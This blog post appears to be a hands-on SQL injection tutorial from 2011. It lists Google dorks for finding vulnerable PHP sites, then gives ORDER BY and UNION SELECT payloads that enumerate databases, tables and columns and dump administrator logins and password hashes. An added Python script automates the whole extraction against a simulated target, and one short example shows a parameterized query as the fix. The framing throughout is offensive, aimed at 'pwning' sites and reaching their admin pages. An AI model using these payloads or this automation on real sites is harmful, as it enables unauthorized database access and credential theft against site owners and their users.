
[Tutorial]: SQL injections part I

Posted by deepquest on June 27, 2011 – 4:43 pm

There are 1000's of tutorials around SQL injection; some of the tutorials I found were good, some bad, some too long. But I finally found something interesting to share, being a bit lazy to write my own, not enough time for this.

SQL injection, aka SQLi, is a way of manipulating a URL parameter so that the text you supply gets executed as part of the site's SQL query. Bad code (a parameter pasted straight into the query string) = good SQLi.
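To make "bad code" concrete, here is an added example (mine, not code from the original post or from the tutorial's author): a small Python stand-in for the PHP page, with the raw id parameter concatenated into the query, beside the parameterized form. SQLite is used in place of MySQL, and the table, rows and function names are constructed for the example.

```python
import sqlite3


def make_db():
    """Constructed sample data standing in for the site's MySQL backend."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE news (id INTEGER, title TEXT, body TEXT)")
    db.executemany("INSERT INTO news VALUES (?,?,?)",
                   [(828, "Hello", "first post"), (829, "World", "second post")])
    return db


def view_vulnerable(db, id_param):
    """The 'bad code' pattern: whatever arrives in ?id= becomes part of the SQL.
    A stray quote breaks the syntax, and a UNION appends the attacker's own SELECT."""
    sql = "SELECT id, title, body FROM news WHERE id = " + id_param
    return db.execute(sql).fetchall()


def view_safe(db, id_param):
    """Hardened form: the value travels as a bound parameter, never as SQL text,
    so a quote or a UNION is just an id that matches nothing."""
    sql = "SELECT id, title, body FROM news WHERE id = ?"
    return db.execute(sql, (id_param,)).fetchall()


def probe(view, db, id_param):
    """What an attacker sees for one request: 'ok', 'empty' or 'error'."""
    try:
        rows = view(db, id_param)
    except sqlite3.Error:
        return "error"
    return "ok" if rows else "empty"


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, id=828'  ->", probe(view_vulnerable, db, "828'"))   # error
    print("safe,       id=828'  ->", probe(view_safe, db, "828'"))         # empty
    print("vulnerable, UNION    ->", view_vulnerable(db, "-828 UNION SELECT 1,2,3--"))
```

The quote test from the tutorial is exactly the first line of the usage: the vulnerable page errors, the parameterized one simply finds no row, which is why a site that uses bound parameters does not give you the "SQL error" tell.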

Feel free to comment and feed back.

SQL Injection

Right... This is an in-depth tutorial with pics XD on how to do SQL injection correctly.

I take it you know what SQL injection is... the basics, I mean XD. You wouldn't be here otherwise, would you?

Let's get cracking.

#1. Finding vulnerable sites
#2. Finding the number of columns
#3. Getting the MySQL version and current user
#4. Getting databases
#5. Getting tables
#6. Getting columns
#7. Getting usernames and passwords

Let’s do this mofo’s

#1.

You can't SQL a site unless you first locate one. "How do we do this?" is the question rolling around your heads. Well... we use something called a dork. "I beg your pardon, did this mofo call me a dork?" A Google dork XD. It's a search query that can be used to locate potentially vulnerable sites through the Google search engine: pages that take a numeric id straight from the URL.

A list of commonly used Google dorks:
inurl:index.php?id=
inurl:news.php?id=
inurl:category.php?id=
inurl:games.php?id=
inurl:forum.php?tid=
inurl:newsletter.php?id=
inurl:content.php?id=

I've found my vulnerable site, now wtf do I do... Well, the common answer to that question is to check whether it's actually vulnerable. In order to do this we add a ' at the end of the value. The unbalanced quote ends up inside the query, breaks its syntax, and makes the database complain.

So for example:
http://examplesite.com/news/view.php?id=828

^ ^ That's the site I found (remember, this is an example).

All we do is add a ‘
Like so:
http://examplesite.com/news/view.php?id=828’

We can add the ' before or after the number; either way it still checks whether the site is vulnerable, because the stray quote breaks the query in both positions.

How do I know if it's vulnerable? Well, you will see something like this:
http://img220.imageshack.us/img220/6660/sqlitut1.jpg

Notice the SQL error? That is exactly what we are after. (A site that hides its database errors can still be vulnerable; you just don't get this easy tell and have to look for a changed or blank page instead.) Now it's time to move on to Step 2.

#2. Finding the number of columns
In order to find the number of columns we use an ORDER BY statement. The concept behind it is pretty simple: ORDER BY n sorts by the n-th column of the page's own SELECT, so it works while n is within the column count and errors once n is past it. We keep increasing the number until an error is received, so...

http://examplesite.com/news/view.php?id=828 order by 1-- (page loads normally)
http://examplesite.com/news/view.php?id=828 order by 2-- (page loads normally)
http://examplesite.com/news/view.php?id=828 order by 3-- (page loads normally)
http://examplesite.com/news/view.php?id=828 order by 4-- (page loads normally)
http://examplesite.com/news/view.php?id=828 order by 5-- (page loads normally)
http://examplesite.com/news/view.php?id=828 order by 6-- (page loads normally)
http://examplesite.com/news/view.php?id=828 order by 7-- (page loads normally)
http://examplesite.com/news/view.php?id=828 order by 8-- (page loads normally)
http://examplesite.com/news/view.php?id=828 order by 9-- (error)

(Don't actually type the "(page loads normally)" part; I was just showing you where the error shows up. The -- at the end is a MySQL comment that throws away whatever the page appends after your value. MySQL needs a space after --, which a browser may drop from the end of a URL, so people usually type --+ or -- - in the address bar.)

Alright, so we received an error on column 9. This means we have 8 columns. "But you received the error on 9?" Yes, true, but every page before that loaded fine, so it's 8 columns.

So you've found out how many columns there are. Now what's next?

Next is a UNION SELECT statement with the same number of columns (8 here), so that the rows we append fit onto the page's own query:

http://examplesite.com/news/view.php?id=-828 union select 1,2,3,4,5,6,7,8--

(Make note of the hyphen before the number. id=-828 matches no real article, so the page's own query returns nothing and the row we added with UNION is the one that gets rendered.)

You should see numbers on the site like so:
http://img842.imageshack.us/img842/5738/sqlitut2.jpg

This proves to us that this site is vulnerable to SQL injection, and it tells us which column numbers actually get printed on the page: those are the slots we can read data through. Now it's time for #3, mofo's XD.

#3. Getting the MySQL version and current user
So we've worked out the columns and displayed the column numbers on the screen. Next is getting the SQL version and the current user.

To do this we use this SQL command:
http://examplesite.com/news/view.php?id=-828 union select 1,2,@@version,4,5,6,7,8--

(Make note that we've used column 3 to display the SQL version, because 3 was one of the numbers that showed up on the page in step 2. Use whichever of your numbers is visible.)
http://img823.imageshack.us/img823/8895/sqlitut3.jpg

5.0.22, this mofo site is vulnerable. The version matters: information_schema, which the next steps rely on, only exists from MySQL 5.0 onwards, so on a 4.x server you have to guess table and column names instead. The majority are 5 or above anyway.

Next, let's get the current user on this thing. To do that we type in:

http://examplesite.com/news/view.php?id=-828 union select 1,2,user(),4,5,6,7,8--

Notice the user() function? It goes in the same place where we put @@version before.

If you've done it correctly you should see something like this:
http://img690.imageshack.us/img690/611/sqlitut4.jpg

Now comes the interesting stuff... Let's hit up part #4.

#4. Getting databases
Now the cool stuff: we want the list of databases and the current database. To list every database the site's user can see, we query information_schema.schemata:

http://examplesite.com/news/view.php?id=-828+UNION+SELECT+1,2,group_concat(schema_name),4,5,6,7,8+from+information_schema.schemata--

Notice the group_concat(schema_name) is in slot number 3 again? group_concat() joins all the result rows into one comma-separated string, so we get the whole list through a single visible column. This will display the information we are after:

http://img864.imageshack.us/img864/1689/sqlitut5.jpg

The current database is pretty obvious, but hey... it comes in handy XD, because the site's tables live there.

To view the current database use this syntax:

http://examplesite.com/news/view.php?id=-828+UNION+SELECT+1,2,database(),4,5,6,7,8--

You should receive something like this:
http://img194.imageshack.us/img194/7368/sqlitut6.jpg

Like I said, pretty obvious, haha.

So we've worked out the database name. Now we want those mofo tables, so let's move on to #5.

#5. Getting tables
In order to get the tables we continue using that handy UNION SELECT, this time reading information_schema.tables and filtering with table_schema=database() so we only see the current database's tables:

http://examplesite.com/news/view.php?id=-828+UNION+SELECT+1,2,group_concat(table_name),4,5,6,7,8+from+information_schema.tables+where+table_schema=database()--

Before we move on, I want you to study that syntax and take note of the parts used there: the table being read, the column being concatenated, the filter on the database.

If you've done that correctly you should receive something like this:
http://img830.imageshack.us/img830/3971/sqlitut7.jpg

I've put a box round the user table, cause well... you don't SQL a site without wanting to get the user table XD.

Judging from the other tables, I can safely say the passwords and users will all be in the bpusers table. Scribble this name down and let's move on to part #6.

#6. Getting columns
So we've found our user table, now we want the columns out of it. How do we do this, you ask? Well... it's pretty simple: information_schema.columns lists every column of every table, so we filter it down to our table:

http://examplesite.com/news/view.php?id=-828+UNION+SELECT+1,2,group_concat(column_name),4,5,6,7,8+from+information_schema.columns+where+table_schema=database()+and+table_name='bpusers'--

(Without the table_name condition you get the columns of every table in the database in one long list, which is harder to read. If the site strips quotes, write the name as a hex string instead: table_name=0x62707573657273 is the same as 'bpusers'.)

As before, I want you to read through the syntax and try to understand what everything in there is doing.

Right... If you have done that correctly, you should receive something like this:
http://img24.imageshack.us/img24/8813/sqlitut8.jpg

Notice the 2 columns I've highlighted, login and password? These contain the info we want for gaining access XD.

#7. Dumping users/passwords
So you've found your site, found the columns, database, tables etc. etc. Now I bet you wanna pwn this mofo, so we are going to dump the login and password columns. This time we select from the real table instead of information_schema:

http://examplesite.com/news/view.php?id=-828+UNION+SELECT+1,2,group_concat(login,0x3a,password,0x3a),4,5,6,7,8+from+bpusers--

Right, this syntax is a little more involved than the others, so as before, read through it and try to work out what is being done.

(NOTE: 0x3a is the hex form of ':', so it puts a : between logins and passwords without you having to type a quote character that the site might filter. group_concat then separates the user entries with commas.)

If you've done this correctly you should receive something similar to this:
http://img145.imageshack.us/img145/4508/sqlitut9.jpg

YEAH!!!!!!! There are that mofo admin's details.

Congratulations, you have now officially 'parred' the site. All that is required now is to find the admin page (and, since the password column is usually a hash rather than the plain text, to crack it first).
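Steps 2 to 7 are one mechanical procedure, so here it is driven end to end by a script. This is an added example of mine, not the tutorial author's code, and it runs offline against a constructed stand-in for the vulnerable page: SQLite replaces MySQL, so sqlite_version() stands in for @@version, sqlite_master and pragma_table_info() stand in for information_schema, || stands in for MySQL's string concatenation and char(58) plays the role of 0x3a. The news/bpusers tables, their rows and all function names are invented for the example.

```python
import re
import sqlite3

MARK = "sqli"  # marker text we can find again in the rendered page


def build_target():
    """Constructed stand-in for the vulnerable site: an 8-column news table
    (so ORDER BY 9 errors, as in the tutorial) and a user table of hashes."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE news (id INTEGER, c2 TEXT, c3 TEXT, c4 TEXT, "
               "c5 TEXT, c6 TEXT, c7 TEXT, c8 TEXT)")
    db.execute("INSERT INTO news VALUES (828,'t','b','x','d','x','x','x')")
    db.execute("CREATE TABLE bpusers (login TEXT, password TEXT)")
    db.execute("INSERT INTO bpusers VALUES ('admin','5f4dcc3b5aa765d61d8327deb882cf99')")
    db.execute("INSERT INTO bpusers VALUES ('editor','d8578edf8458ce06fbc5bb76a58c5ca4')")

    def view(id_param):
        # The bad code: the raw ?id= value is concatenated straight into the query.
        sql = "SELECT id,c2,c3,c4,c5,c6,c7,c8 FROM news WHERE id = " + id_param
        return db.execute(sql).fetchall()
    return view


def page(view, id_param):
    """One simulated request: the rendered page text, or None when the query
    errors (the 'SQL error' the tutorial looks for). Like a real template the
    page only prints some of the selected columns (here 2, 3 and 5)."""
    try:
        rows = view(id_param)
    except sqlite3.Error:
        return None
    return "".join(f"<h1>{r[1]}</h1><p>{r[2]}</p><small>{r[4]}</small>" for r in rows)


def find_column_count(view, limit=32):
    """Step 2: ORDER BY n loads normally while n <= column count, errors past it."""
    for n in range(1, limit + 1):
        if page(view, f"828 ORDER BY {n}--") is None:
            return n - 1
    raise RuntimeError("no ORDER BY error up to limit")


def find_reflected_columns(view, ncols):
    """Step 2, UNION part: -828 matches no real row, so the UNION row is what gets
    rendered; numbered marker strings show which positions reach the page."""
    sel = ",".join(f"'{MARK}{i}{MARK}'" for i in range(1, ncols + 1))
    body = page(view, f"-828 UNION SELECT {sel}--") or ""
    return [int(m) for m in re.findall(MARK + r"(\d+)" + MARK, body)]


def extract(view, ncols, slot, expr, tail=""):
    """Steps 3-7: put an expression in a reflected slot, pad the other slots with
    numbers, and read the value back from between two marker strings."""
    cols = [str(i) for i in range(1, ncols + 1)]
    cols[slot - 1] = f"'{MARK}<' || ({expr}) || '>{MARK}'"   # MySQL: concat(...)
    body = page(view, f"-828 UNION SELECT {','.join(cols)} {tail}--") or ""
    m = re.search(MARK + "<(.*?)>" + MARK, body)
    return m.group(1) if m else None


def run_tutorial(view):
    """Drive the whole procedure against one target and collect each step's result."""
    ncols = find_column_count(view)                 # tutorial: 8
    slot = find_reflected_columns(view, ncols)[0]   # tutorial used slot 3
    return {
        "columns": ncols,
        "slot": slot,
        # MySQL: @@version / user()
        "version": extract(view, ncols, slot, "sqlite_version()"),
        # MySQL: group_concat(table_name) from information_schema.tables where table_schema=database()
        "tables": extract(view, ncols, slot, "group_concat(name)",
                          "FROM sqlite_master WHERE type='table'"),
        # MySQL: group_concat(column_name) from information_schema.columns where table_name='bpusers'
        "user_columns": extract(view, ncols, slot, "group_concat(name)",
                                "FROM pragma_table_info('bpusers')"),
        # MySQL: group_concat(login,0x3a,password); char(58) is ':' without typing a quote
        "creds": extract(view, ncols, slot, "group_concat(login || char(58) || password)",
                         "FROM bpusers"),
    }


if __name__ == "__main__":
    for key, value in run_tutorial(build_target()).items():
        print(f"{key}: {value}")
```

Against a real site the `page()` function would be an HTTP request and the markers would be wrapped with concat() and hex strings; the logic is otherwise the same, and the marker-wrapping is what lets a script tell the extracted value apart from the padding numbers and the rest of the HTML.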

Enjoy, and happy SQLing.


This post is under "Lulz, Security" and has 2 responses so far.

2 Responses so far

1. Assassin said:

    Hey my friend, do you use Ubuntu or Windows?

2. deepquest said:

    What I use is not the problem, SQLi works from any platform.
